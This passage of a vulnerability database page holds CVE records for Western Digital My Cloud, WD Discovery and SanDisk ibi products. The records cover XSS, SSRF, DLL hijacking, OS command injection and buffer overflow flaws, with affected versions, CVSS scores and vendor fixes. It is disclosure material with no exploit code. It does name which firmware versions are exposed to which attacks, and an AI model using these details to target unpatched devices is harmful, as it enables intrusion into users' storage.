"lessThan": "4.28.0-102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "My Cloud web app",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "4.28.0-102",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "Western Digital would like to thank Jay Mehta for reporting this issue"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: var(--wht);\"\u003eA Cross-Site Scripting (XSS) vulnerability on the My Cloud, My Cloud Home, SanDisk ibi, and WD Cloud web apps was found which \u003c/span\u003e\u003cspan style=\"background-color: var(--wht);\"\u003ecould allow an attacker to redirect the user to a crafted domain and reset their credentials, or to execute arbitrary client-side code in the user\u2019s browser session to carry out malicious activities.\u003c/span\u003e\u003cp\u003eThe web apps for these devices have been automatically updated to resolve this vulnerability and improve the security of your devices and data.\u003c/p\u003e\u003cbr\u003e"
}
],
"value": "A Cross-Site Scripting (XSS) vulnerability on the My Cloud, My Cloud Home, SanDisk ibi, and WD Cloud web apps was found which could allow an attacker to redirect the user to a crafted domain and reset their credentials, or to execute arbitrary client-side code in the user\u2019s browser session to carry out malicious activities.The web apps for these devices have been automatically updated to resolve this vulnerability and improve the security of your devices and data."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "HIGH",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "ACTIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or \u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-24T22:54:16.903Z",
"orgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"shortName": "WDC PSIRT"
},
"references": [
{
"url": "https://www.westerndigital.com/support/product-security/wdc-24003-western-digital-my-cloud-os-5-my-cloud-home-sandisk-ibi-and-wd-cloud-web-app-update"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cdiv\u003e\u003cdiv\u003e\u003cp\u003eThe web apps for these devices have been automatically updated to resolve this vulnerability and improve the security of your devices and data.\u003c/p\u003e\u003c/div\u003e\u003c/div\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cdiv\u003e\u003c/div\u003e\u003c/div\u003e\u003c/div\u003e"
}
],
"value": "The web apps for these devices have been automatically updated to resolve this vulnerability and improve the security of your devices and data."
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Cross-Site Scripting (XSS) vulnerability on Western Digital My Cloud and SanDisk ibi Web Apps",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"assignerShortName": "WDC PSIRT",
"cveId": "CVE-2024-22168",
"datePublished": "2024-06-24T22:54:16.903Z",
"dateReserved": "2024-01-05T18:43:18.488Z",
"dateUpdated": "2024-08-01T22:35:34.879Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-22819 (GCVE-0-2023-22819)
Vulnerability from cvelistv5 – Published: 2024-02-05 21:26 – Updated: 2024-09-05 22:47
VLAI
Title
Uncontrolled resource consumption vulnerability in Western Digital My Cloud, My Cloud Home and SanDisk ibi products
Summary
An uncontrolled resource consumption vulnerability issue that could arise by sending crafted requests to a service to consume a large amount of memory, eventually resulting in the service being stopped and restarted was discovered in Western Digital My Cloud Home, My Cloud Home Duo, SanDisk ibi and Western Digital My Cloud OS 5 devices. This issue requires the attacker to already have root privileges in order to exploit this vulnerability. This issue affects My Cloud Home and My Cloud Home Duo: before 9.5.1-104; ibi: before 9.5.1-104; My Cloud OS 5: before 5.27.161.
Severity
4.9 (Medium)
SSVC
Exploitation: none
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-770 - Allocation of Resources Without Limits or Throttling
Assigner
References
1 reference
Impacted products
3 products
| Vendor | Product | Version | |
|---|---|---|---|
| Western Digital | My Cloud OS 5 |
Affected:
0 , < 5.27.161
(custom)
|
|
| Western Digital | My Cloud Home & Duo |
Affected:
0 , < 9.5.1-104
(custom)
|
|
| SanDisk | ibi |
Affected:
0 , < 9.5.1-104
(custom)
|
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-22819",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-07T16:00:14.828373Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-07T16:00:24.870Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T10:20:30.729Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.westerndigital.com/support/product-security/wdc-24001-western-digital-my-cloud-os-5-my-cloud-home-duo-and-sandisk-ibi-firmware-update"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"platforms": [
"Linux"
],
"product": "My Cloud OS 5",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "5.27.161",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"platforms": [
"Linux"
],
"product": "My Cloud Home \u0026 Duo",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "9.5.1-104",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"platforms": [
"Linux"
],
"product": "ibi",
"vendor": "SanDisk",
"versions": [
{
"lessThan": "9.5.1-104",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Sam Thomas (@_s_n_t) of Pentest Ltd (@pentestltd) working with Trend Micro\u2019s Zero Day Initiative"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eAn uncontrolled resource consumption vulnerability issue that could arise by sending crafted requests to a service to consume a large amount of memory, eventually resulting in the service being stopped and restarted was discovered in Western Digital My Cloud Home, My Cloud Home Duo, SanDisk ibi and Western Digital My Cloud OS 5 devices. This issue requires the attacker to already have root privileges in order to exploit this vulnerability. This issue affects My Cloud Home and My Cloud Home Duo: before 9.5.1-104; ibi: before 9.5.1-104; My Cloud OS 5: before 5.27.161.\u003c/span\u003e"
}
],
"value": "An uncontrolled resource consumption vulnerability issue that could arise by sending crafted requests to a service to consume a large amount of memory, eventually resulting in the service being stopped and restarted was discovered in Western Digital My Cloud Home, My Cloud Home Duo, SanDisk ibi and Western Digital My Cloud OS 5 devices. This issue requires the attacker to already have root privileges in order to exploit this vulnerability. This issue affects My Cloud Home and My Cloud Home Duo: before 9.5.1-104; ibi: before 9.5.1-104; My Cloud OS 5: before 5.27.161."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770 Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-09-05T22:47:28.039Z",
"orgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"shortName": "WDC PSIRT"
},
"references": [
{
"url": "https://www.westerndigital.com/support/product-security/wdc-24001-western-digital-my-cloud-os-5-my-cloud-home-duo-and-sandisk-ibi-firmware-update"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003e\u003c/p\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cp\u003e\u003cspan style=\"background-color: var(--wht);\"\u003eFor My Cloud OS 5 devices, \u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eWestern Digital recommends that users promptly update their devices to the latest firmware by clicking on the firmware update notification.\u003c/span\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"background-color: var(--wht);\"\u003eMy Cloud Home, My Cloud Home Duo and SanDisk ibi devices will be automatically updated to reflect the latest firmware version.\u003c/span\u003e\u003c/p\u003e\u003c/div\u003e\u003c/div\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cdiv\u003e\u003c/div\u003e\u003c/div\u003e\u003c/div\u003e\u003cp\u003e\u003c/p\u003e"
}
],
"value": "For My Cloud OS 5 devices, Western Digital recommends that users promptly update their devices to the latest firmware by clicking on the firmware update notification.\n\nMy Cloud Home, My Cloud Home Duo and SanDisk ibi devices will be automatically updated to reflect the latest firmware version."
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Uncontrolled resource consumption vulnerability in Western Digital My Cloud, My Cloud Home and SanDisk ibi products",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"assignerShortName": "WDC PSIRT",
"cveId": "CVE-2023-22819",
"datePublished": "2024-02-05T21:26:53.171Z",
"dateReserved": "2023-01-06T20:23:44.301Z",
"dateUpdated": "2024-09-05T22:47:28.039Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-22817 (GCVE-0-2023-22817)
Vulnerability from cvelistv5 – Published: 2024-02-05 21:26 – Updated: 2024-08-02 10:20
VLAI
Title
Server-side Request Forgery vulnerability in Western Digital My Cloud, My Cloud Home and SanDisk ibi products
Summary
Server-side request forgery (SSRF) vulnerability that could allow a rogue server on the local network to modify its URL using another DNS address to point back to the loopback adapter. This could then allow the URL to exploit other vulnerabilities on the local server. This was addressed by fixing DNS addresses that refer to loopback. This issue affects My Cloud OS 5 devices before 5.27.161, My Cloud Home, My Cloud Home Duo and SanDisk ibi devices before 9.5.1-104.
Severity
5.5 (Medium)
SSVC
Exploitation: none
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
1 reference
Impacted products
3 products
| Vendor | Product | Version | |
|---|---|---|---|
| Western Digital | My Cloud OS 5 |
Affected:
0 , < 5.27.161
(custom)
|
|
| Western Digital | My Cloud Home & Duo |
Affected:
0 , < 9.5.1-104
(custom)
|
|
| SanDisk | ibi |
Affected:
0 , < 9.5.1-104
(custom)
|
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-22817",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-02-06T15:36:16.188338Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:32.355Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T10:20:31.069Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://www.westerndigital.com/support/product-security/wdc-24001-western-digital-my-cloud-os-5-my-cloud-home-duo-and-sandisk-ibi-firmware-update"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"platforms": [
"Linux"
],
"product": "My Cloud OS 5",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "5.27.161",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"platforms": [
"Linux"
],
"product": "My Cloud Home \u0026 Duo",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "9.5.1-104",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"platforms": [
"Linux"
],
"product": "ibi",
"vendor": "SanDisk",
"versions": [
{
"lessThan": "9.5.1-104",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"user": "00000000-0000-4000-9000-000000000000",
"value": "Sam Thomas (@_s_n_t) of Pentest Ltd (@pentestltd) working with Trend Micro\u2019s Zero Day Initiative"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Server-side request forgery (SSRF) vulnerability that could allow a rogue server on the local network to modify its URL using another DNS address to point back to the loopback adapter. This could then allow the URL to exploit other vulnerabilities on the local server. This was addressed\u0026nbsp;\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eby fixing DNS addresses that refer to loopback. \u003c/span\u003eThis issue affects My Cloud OS 5 devices before 5.27.161, My Cloud Home, My Cloud Home Duo and SanDisk ibi devices before 9.5.1-104.\u0026nbsp;\u003cbr\u003e"
}
],
"value": "Server-side request forgery (SSRF) vulnerability that could allow a rogue server on the local network to modify its URL using another DNS address to point back to the loopback adapter. This could then allow the URL to exploit other vulnerabilities on the local server. This was addressed\u00a0by fixing DNS addresses that refer to loopback. This issue affects My Cloud OS 5 devices before 5.27.161, My Cloud Home, My Cloud Home Duo and SanDisk ibi devices before 9.5.1-104.\u00a0\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918 Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-02-05T21:26:42.020Z",
"orgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"shortName": "WDC PSIRT"
},
"references": [
{
"url": "https://www.westerndigital.com/support/product-security/wdc-24001-western-digital-my-cloud-os-5-my-cloud-home-duo-and-sandisk-ibi-firmware-update"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cdiv\u003e\u003cdiv\u003e\u003cp\u003e\u003cspan style=\"background-color: var(--wht);\"\u003eFor My Cloud OS 5 devices,\u0026nbsp;\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eWestern Digital recommends that users promptly update their devices to the latest firmware by clicking on the firmware update notification.\u003c/span\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"background-color: var(--wht);\"\u003eMy Cloud Home, My Cloud Home Duo and SanDisk ibi devices will be automatically updated to reflect the latest firmware version.\u003c/span\u003e\u003cbr\u003e\u003c/p\u003e\u003c/div\u003e\u003cdiv\u003e\u003c/div\u003e\u003c/div\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003c/div\u003e\u003c/div\u003e\u003c/div\u003e\u003cbr\u003e"
}
],
"value": "For My Cloud OS 5 devices,\u00a0Western Digital recommends that users promptly update their devices to the latest firmware by clicking on the firmware update notification.\n\nMy Cloud Home, My Cloud Home Duo and SanDisk ibi devices will be automatically updated to reflect the latest firmware version.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Server-side Request Forgery vulnerability in Western Digital My Cloud, My Cloud Home and SanDisk ibi products",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"assignerShortName": "WDC PSIRT",
"cveId": "CVE-2023-22817",
"datePublished": "2024-02-05T21:26:42.020Z",
"dateReserved": "2023-01-06T20:23:44.301Z",
"dateUpdated": "2024-08-02T10:20:31.069Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-30248 (GCVE-0-2025-30248)
Vulnerability from nvd – Published: 2026-01-26 22:47 – Updated: 2026-01-27 21:33
VLAI
Summary
DLL hijacking in the WD Discovery Installer in Western Digital WD Discovery 5.2.730 on Windows allows a local attacker to execute arbitrary code via placement of a crafted dll in the installer's search path.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
Assigner
References
1 reference
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| Western Digital | WD Discovery |
Affected:
0 , < 5.3
(custom)
|
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-30248",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-01-27T21:33:07.552813Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-01-27T21:33:27.911Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"platforms": [
"Windows"
],
"product": "WD Discovery",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "5.3",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Kazuma Matsumoto, Security Researcher at GMO Cybersecurity by IERAE, Inc"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cstrong\u003eDLL hijacking in the WD Discovery Installer in Western Digital WD Discovery 5.2.730 on Windows allows a local attacker to execute arbitrary code via placement of a crafted dll in the installer\u0027s search path.\u003cbr\u003e\u003cbr\u003e\u003c/strong\u003e\u003cbr\u003e"
}
],
"value": "DLL hijacking in the WD Discovery Installer in Western Digital WD Discovery 5.2.730 on Windows allows a local attacker to execute arbitrary code via placement of a crafted dll in the installer\u0027s search path."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "HIGH",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.9,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "ACTIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-427",
"description": "CWE-427",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-01-26T23:03:27.954Z",
"orgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"shortName": "WDC PSIRT"
},
"references": [
{
"url": "https://www.westerndigital.com/support/product-security/wdc-25008-wd-discovery-desktop-app-version-5-3"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eWestern Digital recommends users download the latest version from the WD Discovery Downloads page or by following the instructions on the \u003c/span\u003e\u003ca target=\"_blank\" rel=\"nofollow\" href=\"https://support-en.wd.com/app/answers/detailweb/a_id/20465\"\u003eWD Discovery: Online User Guide\u003c/a\u003e\u003cbr\u003e"
}
],
"value": "Western Digital recommends users download the latest version from the WD Discovery Downloads page or by following the instructions on the WD Discovery: Online User Guide https://support-en.wd.com/app/answers/detailweb/a_id/20465"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"assignerShortName": "WDC PSIRT",
"cveId": "CVE-2025-30248",
"datePublished": "2026-01-26T22:47:58.624Z",
"dateReserved": "2025-03-19T16:24:18.441Z",
"dateUpdated": "2026-01-27T21:33:27.911Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-30247 (GCVE-0-2025-30247)
Vulnerability from nvd – Published: 2025-09-29 21:07 – Updated: 2025-09-30 14:56
VLAI
Summary
An OS command injection vulnerability in user interface in Western Digital My Cloud firmware prior to 5.31.108 on NAS platforms allows remote attackers to execute arbitrary system commands via a specially crafted HTTP POST.
Severity
SSVC
Exploitation: none
Automatable: yes
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Assigner
References
1 reference
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| Western Digital | My Cloud |
Affected:
0 , < 5.31.108
(custom)
|
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-30247",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-30T14:56:27.048234Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-09-30T14:56:37.134Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "My Cloud",
"vendor": "Western Digital",
"versions": [
{
"lessThan": "5.31.108",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "Western Digital would like to thank w1th0ut for reporting this"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An OS command injection vulnerability in user interface in Western Digital My Cloud firmware prior to 5.31.108 on NAS platforms allows remote attackers to execute arbitrary system commands via a specially crafted HTTP POST.\u003cbr\u003e"
}
],
"value": "An OS command injection vulnerability in user interface in Western Digital My Cloud firmware prior to 5.31.108 on NAS platforms allows remote attackers to execute arbitrary system commands via a specially crafted HTTP POST."
}
],
"impacts": [
{
"descriptions": [
{
"lang": "en",
"value": "capec-137"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 9.3,
"baseSeverity": "CRITICAL",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-29T21:07:20.786Z",
"orgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"shortName": "WDC PSIRT"
},
"references": [
{
"url": "https://www.westerndigital.com/support/product-security/wdc-25006-western-digital-my-cloud-os-5-firmware-5-31-108"
}
],
"source": {
"discovery": "EXTERNAL"
},
"workarounds": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "To take advantage of the latest security fixes, Western Digital recommends that users promptly update their devices to the latest firmware by clicking on the firmware update notification."
}
],
"value": "To take advantage of the latest security fixes, Western Digital recommends that users promptly update their devices to the latest firmware by clicking on the firmware update notification."
}
],
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "cb3b742e-5145-4748-b44b-5ffd45bf3b6a",
"assignerShortName": "WDC PSIRT",
"cveId": "CVE-2025-30247",
"datePublished": "2025-09-29T21:07:20.786Z",
"dateReserved": "2025-03-19T16:24:18.441Z",
"dateUpdated": "2025-09-30T14:56:37.134Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-22170 (GCVE-0-2024-22170)
Vulnerability from nvd – Published: 2024-09-27 17:06 – Updated: 2024-09-27 18:36
VLAI
Title
Unchecked buffer in Dynamic DNS client
Summary
Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Western Digital My Cloud ddns-start on Linux allows Overflow Buffers.This issue affects My Cloud: before 5.29.102.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-119 - Improper Restriction of Operations within the Bounds of a Memory Buffer
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://www.westerndigital.com/support/product-se… | vendor-advisory |
Impacted products
11 products
| Vendor | Product | Version | |
|---|---|---|---|
| Western Digital | My Cloud |
Affected:
0 , < 5.29.102
(custom)
|
|
| westerndigital | wd_cloud_firmware |
Affected:
0 , < 5.29.102
(custom)
cpe:2.3:o:westerndigital:wd_cloud_firmware:*:*:*:*:*:*:*:* |
|
| westerndigital | my_cloud_dl4100_firmware |
Affected:
0 , < 5.29.102
(custom)
cpe:2.3:o:westerndigital:my_cloud_dl4100_firmware:*:*:*:*:*:*:*:* |
|
| westerndigital | my_cloud_dl2100_firmware |
Affected:
0 , < 5.29.102
(custom)
cpe:2.3:o:westerndigital:my_cloud_dl2100_firmware:*:*:*:*:*:*:*:* |
|
| westerndigital | my_cloud_ex2100_firmware |
Affected:
0 , < 5.29.102
(custom)
cpe:2.3:o:westerndigital:my_cloud_ex2100_firmware:*:*:*:*:*:*:*:* |
|
| westerndigital | my_cloud_mirror_g2_firmware |
Affected:
0 , < 5.29.102
(custom)
cpe:2.3:o:westerndigital:my_cloud_mirror_g2_firmware:*:*:*:*:*:*:*:* |
|
| westerndigital | my_cloud_firmware |
Affected:
0 , < 5.29.102
(custom)
cpe:2.3:o:westerndigital:my_cloud_firmware:*:*:*:*:*:*:*:* |
|
| westerndigital | my_cloud_pr4100_firmware |
Affected:
0 , < 5.29.102
(custom)
cpe:2.3:o:westerndigital:my_cloud_pr4100_firmware:*:*:*:*:*:*:*:* |
|
| westerndigital | my_cloud_pr2100_firmware |
Affected:
0 , < 5.29.102
(custom)
cpe:2.3:o:westerndigital:my_cloud_pr2100_firmware:*:*:*:*:*:*:*:* |
|
| westerndigital | my_cloud_ex4100_firmware |
Affected:
0 , < 5.29.102
(custom)
cpe:2.3:o:westerndigital:my_cloud_ex4100_firmware:*:*:*:*:*:*:*:* |
|
| westerndigital | my_cloud_ex2_ultra_firmware |
Affected:
0 , < 5.29.102
(custom)
